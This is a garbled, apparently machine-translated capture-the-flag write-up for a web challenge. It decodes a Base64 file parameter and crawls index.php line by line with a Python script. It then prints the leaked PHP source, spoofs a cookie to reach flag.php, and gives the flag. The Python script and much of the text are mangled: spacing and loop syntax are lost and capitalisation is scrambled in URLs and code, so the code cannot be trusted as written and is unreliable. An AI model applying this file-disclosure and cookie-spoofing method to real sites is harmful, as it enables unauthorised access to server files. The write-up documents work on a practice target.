Title Link: http://ctf.idf.cn/index.php?g=game&m=article&a=index&id=40
Knowledge Points: Base64 decoding, Cookie spoofing
Here →http://ctf.idf.cn/game/web/40/index.php here
Ideas:
Click the link to jump to URL:HTTP://CTF.IDF.CN/GAME/WEB/40/INDEX.PHP?LINE=&FILE=ZMXHZY50EHQ, found that the value of the parameter file has been Base64 encoded, decoding is found to be " Flag.txt ", guess that there is a file containing the vulnerability, try to change the value of files to" index.php "the Base64 encoded value access, Web page blank, change the value of line after a row of code, after several attempts to find that the lines Max is 18, write a program to crawl the contents of the file, as follows:
#!/usr/bin/env Python3# __author__: RenzongxianImportRequestsfile = open (' index.php ',' WB ') forIinchRange +): url ="Http://ctf.idf.cn/game/web/40/index.php?line="+ STR (i) +"&FILE=AW5KZXGUCGHW"R =requests.get (URL) content = r.content file.write (content) File.close ()
The captured index.php content is
<?phpError_reporting (0);$file=base64_decode (isset($_get[' file '])?$_get[' file ']:"");$line=isset($_get[' line '])? Intval ($_get[' line ']):0;if($file=="') Header ("Location:index.php?line=&file=zmxhzy50ehq");$file _list=Array(' 0 '=' Flag.txt ',' 1 '=' index.php ', );if(isset($_cookie[' key ']) &&$_cookie[' key ']==' IDF '){$file _list[2]=' flag.php '; }if(In_array ($file,$file _list)){$fa= File ($file);Echo $fa[$line]; }?>
According to the code content, when the cookie contains ' KEY=IDF ', you can access the ' flag.php ' file, change the file parameter to "flag.php" encoded value, block access and add a cookie, can be seen in the Web page source code<?php $flag=‘wctf{idf_c00kie}‘;?>
?
Idf-ctf-cookie Cheat Answer notes